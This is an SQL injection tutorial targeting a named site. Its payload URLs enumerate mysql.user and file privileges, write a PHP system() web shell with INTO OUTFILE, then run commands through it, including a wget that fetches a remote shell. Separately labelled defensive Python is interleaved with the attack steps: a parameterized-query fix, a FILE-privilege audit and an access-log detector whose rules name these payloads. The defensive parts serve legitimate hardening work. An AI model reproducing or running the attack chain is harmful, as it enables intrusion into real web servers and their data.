In this tutorial I will show you how to upload a shell via SQLi.
This method is useful when you have admin info but can't upload anything, or when you have admin info but can't find the admin login, and so on.
But this method is very rare!
Anyways let's start with our tutorial...
Things we will need:
1) Your shell source in .txt format (I will use http://www.sh3ll.org)
2) Basic SQLi skill
So let's say you injected our site like this:
http://shop.moto25.ru/news.php?newsnomber=-999+union+select+1,2,3,4--
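The reason the probe above works is that news.php pastes the newsnomber parameter straight into the SQL text. The following is an added example, not code from the tutorial or from the site it describes: a constructed SQLite stand-in for the news table (the real schema is unknown) with the concatenating lookup next to its parameterized replacement, so the difference can be run offline.

```python
import sqlite3

# Constructed in-memory stand-in for a news table; the real site's schema is unknown.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT, posted TEXT)")
    conn.execute("INSERT INTO news VALUES (2, 'Opening hours', 'We open at 9.', '2010-01-01')")
    return conn

def vulnerable_lookup(conn, newsnomber):
    """The pattern behind news.php: the request parameter becomes part of the SQL text."""
    sql = "SELECT id, title, body, posted FROM news WHERE id = " + newsnomber
    return conn.execute(sql).fetchone()

def safe_lookup(conn, newsnomber):
    """Hardened form: validate the type, then bind the value so it can never alter the query."""
    try:
        news_id = int(newsnomber)   # an id is an integer; anything else is rejected up front
    except ValueError:
        return None
    sql = "SELECT id, title, body, posted FROM news WHERE id = ?"
    return conn.execute(sql, (news_id,)).fetchone()   # binding alone already defeats the injection

# The page's first probe with '+' decoded to spaces.
PAYLOAD = "-999 union select 1,2,3,4--"

if __name__ == "__main__":
    conn = make_db()
    print("vulnerable:", vulnerable_lookup(conn, PAYLOAD))   # attacker-chosen row (1, 2, 3, 4)
    print("safe:      ", safe_lookup(conn, PAYLOAD))         # None: the payload is not a valid id
    print("safe, id 2:", safe_lookup(conn, "2"))
```

The vulnerable function returns the row the attacker supplied, which is the "1,2,3,4" the tutorial reads back to learn which column is displayed; the bound-parameter version returns nothing for the same input and the real row for a real id.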
Now you have admin info, you logged in and you failed uploading a shell.
Now our method comes to point.
Remember which column you should use. (Mine will be 3)
Type "user" in your vulnerable column and add "from mysql.user" at the end, so the URL would look like:
http://shop.moto25.ru/news.php?newsnomber=-999+union+select+1,2,user,4+from+mysql.user--
NOTE: If you get an error after this you can't use this method.
You should get the current user for the site.
moto25_moto25
Good. Now remember that you will need it.
Now we check users file privilege.
In your column type: "group_concat(user,0x3a,file_priv)"
http://shop.moto25.ru/news.php?newsnomber=-999+union+select+1,2,group_concat(user,0x3a,file_priv),4+from+mysql.user--
Now you should get all users and their file privileges:
root:Y,root:Y,apache:N,moto25_moto25:Y
Now our user was "moto25_moto25"...
That means we can create files on the server.
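The file_priv column is the check a DBA should be running before an attacker does, together with the secure_file_priv variable that decides where INTO OUTFILE may write at all. The following is an added example, not the tutorial's code: it takes constructed rows in the shape of SELECT user, host, file_priv FROM mysql.user and a constructed value of SELECT @@secure_file_priv, and reports which accounts can write server files and the REVOKE statement that removes the privilege. The app_accounts set is an assumption supplied by the caller (the names the web application logs in with).

```python
# Constructed rows in the shape of `SELECT user, host, file_priv FROM mysql.user`; not real data.
SAMPLE_USERS = [
    ("root", "localhost", "Y"),
    ("root", "127.0.0.1", "Y"),
    ("apache", "localhost", "N"),
    ("moto25_moto25", "localhost", "Y"),   # a web-application account holding FILE
]

def outfile_exposure(secure_file_priv):
    """Describe what INTO OUTFILE can reach under a given secure_file_priv value."""
    if secure_file_priv is None:
        return "disabled"      # NULL: the server refuses INTO OUTFILE and LOAD DATA entirely
    if secure_file_priv == "":
        return "anywhere"      # empty string: no restriction, limited only by mysqld's OS permissions
    return "restricted"        # a directory: writes are confined to that directory

def audit_file_priv(rows, secure_file_priv, app_accounts):
    """Return the accounts holding FILE, rated by how much INTO OUTFILE can do with it."""
    exposure = outfile_exposure(secure_file_priv)
    findings = []
    for user, host, file_priv in rows:
        if file_priv != "Y":
            continue
        if exposure == "disabled":
            severity = "info"      # privilege is held but the server will not write files
        elif user in app_accounts:
            severity = "high"      # the account an injected web query runs as
        else:
            severity = "medium"
        findings.append({
            "account": f"'{user}'@'{host}'",
            "exposure": exposure,
            "severity": severity,
            "fix": f"REVOKE FILE ON *.* FROM '{user}'@'{host}';",   # FILE is a global privilege
        })
    return findings

if __name__ == "__main__":
    for f in audit_file_priv(SAMPLE_USERS, "", {"moto25_moto25"}):
        print(f["severity"], f["account"], f["exposure"], "->", f["fix"])
```

A web-application account with FILE and an unrestricted secure_file_priv is exactly the combination this tutorial relies on; revoking FILE from the application account, or setting secure_file_priv to NULL or to a directory outside the web root, breaks the technique even when the injection itself remains. Whether the write then succeeds also depends on the mysqld OS user having write permission on the target directory, which is why the tutorial goes looking for a writeable folder next.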
Let's go to the next step.
To create a file on the server you need to find the site's full path.
To do that you must cause an error; hopefully that error will give us the site's path.
We got ours:
/var/www/vhost/moto25/data/www/moto25.ru/
After that we must find a writeable folder on the server.
Just browse around or scan it with Acunetix.
Usually public_html folder is writeable.
For our example I used
http://shop.moto25.ru/equip/
So spawning our shell is as easy as 1, 2, 3..
Let's get back at our injection.
http://shop.moto25.ru/news.php?newsnomber=-999+union+select+1,2,3,4--
Our vulnerable column should hold our PHP line.
In there we type:
"<?php system($_GET['cmd']); ?>"
NOTE: Quotation marks are required
All other columns should be "null"
http://shop.moto25.ru/news.php?newsnomber=-999+union+select+null,null,"<?php system($_GET['cmd']); ?>",null--
And at the end we use the "INTO OUTFILE" clause.
http://shop.moto25.ru/news.php?newsnomber=-999+union+select+null,null,"<?php system($_GET['cmd']); ?>",null INTO OUTFILE--
Now we use the site's full path and the writeable folder:
/var/www/vhost/moto25/data/www/moto25.ru/equip/
Now
http://shop.moto25.ru/news.php?newsnomber=-999+union+select+null,null,"<?php system($_GET['cmd']); ?>",null INTO OUTFILE /var/www/vhost/moto25/data/www/moto25.ru/equip/--
And our file name and extension.
http://shop.moto25.ru/news.php?newsnomber=-999+union+select+null,null,"<?php system($_GET['cmd']); ?>",null INTO OUTFILE "/var/www/vhost/moto25/data/www/moto25.ru/equip/phpcmd.php"--
Now our shell should be spawned.
We now check if our file was created.
http://shop.moto25.ru/equip/phpcmd.php
You should get something like:
Warning: system() [function.system]: Cannot execute a blank command in /sites/full/path/phpcmd.php on line 1
That means our file was created! Yeh...!
We check if it is working:
http://shop.moto25.ru/equip/phpcmd.php?cmd=ls -la
We can see all files in current directory!
And a simple command to download a shell:
http://shop.moto25.ru/equip/phpcmd.php?cmd=wget www.sh3ll.org/egy.txt -O egy.php
Explanation:
wget - Downloads the text file (egy.txt) to the server. -O - Renames it to egy.php
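Every step of this chain leaves a GET request in the web server's access log, and the keywords it depends on (UNION SELECT, mysql.user, file_priv, INTO OUTFILE, a PHP tag inside a query string, a wget or curl that lands in a .php file) are rare in legitimate traffic. The following is an added example, not code from the tutorial: a detector over constructed combined-format log lines (the IP, timestamps, and paths are made up) that URL-decodes each query string, collapses inline comments and double encoding, tags the stage each request belongs to, and then groups the tags per client IP so the full progression stands out as one incident rather than six alerts.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (combined log format); the IP, times and paths are made up.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Oct/2023:13:55:36 +0000] "GET /news.php?newsnomber=12 HTTP/1.1" 200 5123
203.0.113.10 - - [10/Oct/2023:13:55:40 +0000] "GET /news.php?newsnomber=-999+union+select+1,2,3,4-- HTTP/1.1" 200 2010
203.0.113.10 - - [10/Oct/2023:13:55:44 +0000] "GET /news.php?newsnomber=-999+union+select+1,2,group_concat(user,0x3a,file_priv),4+from+mysql.user-- HTTP/1.1" 200 2044
203.0.113.10 - - [10/Oct/2023:13:56:02 +0000] "GET /news.php?newsnomber=-999+union+select+null,null,%22%3C%3Fphp+system(%24_GET%5Bcmd%5D)%3B+%3F%3E%22,null+INTO+OUTFILE+%22/var/www/html/phpcmd.php%22-- HTTP/1.1" 200 2044
203.0.113.10 - - [10/Oct/2023:13:56:10 +0000] "GET /equip/phpcmd.php?cmd=ls HTTP/1.1" 200 300
203.0.113.10 - - [10/Oct/2023:13:56:30 +0000] "GET /equip/phpcmd.php?cmd=wget+http://example.invalid/egy.txt+-O+egy.php HTTP/1.1" 200 120
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Each rule names the stage of the chain it corresponds to; matched against the normalized query.
RULES = [
    ("union_select",        re.compile(r"\bunion\b\s+(all\s+)?select\b")),
    ("mysql_user_enum",     re.compile(r"\bmysql\.user\b")),
    ("file_priv_check",     re.compile(r"\bfile_priv\b")),
    ("into_outfile",        re.compile(r"\binto\s+(out|dump)file\b")),
    ("php_tag_in_query",    re.compile(r"<\?php\b|<\?=")),
    ("remote_fetch_to_php", re.compile(r"\b(wget|curl)\b.*\.php\b")),
]

def normalize_query(target):
    """Decode the query string twice (catches double encoding), drop inline comments, lower-case."""
    query = target.partition("?")[2]
    decoded = unquote_plus(unquote_plus(query))
    decoded = re.sub(r"/\*.*?\*/", " ", decoded)   # /**/ is a common keyword splitter
    return decoded.lower()

def classify(target):
    """Return the stage tags that fire for one request target, in RULES order."""
    query = normalize_query(target)
    return [name for name, rx in RULES if rx.search(query)]

def analyze_log(text):
    """Parse each log line and keep the requests that match at least one rule."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = classify(m["target"])
        if tags:
            findings.append({"ip": m["ip"], "ts": m["ts"],
                             "path": m["target"].partition("?")[0], "tags": tags})
    return findings

def attack_chain(findings):
    """Group tags per client IP in order of first appearance, so the progression is visible."""
    chains = {}
    for f in findings:
        seen = chains.setdefault(f["ip"], [])
        for tag in f["tags"]:
            if tag not in seen:
                seen.append(tag)
    return chains

if __name__ == "__main__":
    hits = analyze_log(SAMPLE_LOG)
    for h in hits:
        print(h["ts"], h["ip"], h["path"], ",".join(h["tags"]))
    print(attack_chain(hits))
```

The plain request for newsnomber=12 and the cmd=ls call produce no tags, the four injection and download requests do, and the per-IP chain shows the same client moving from column discovery through privilege enumeration to a file write and a fetch into a .php file. A file-integrity alert on new .php files under the document root would catch the same event from the other side.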
Game over!
I hope you learned something interesting..
-------------------------------------------------------------------------------------------------------KNOXD3CrypT0r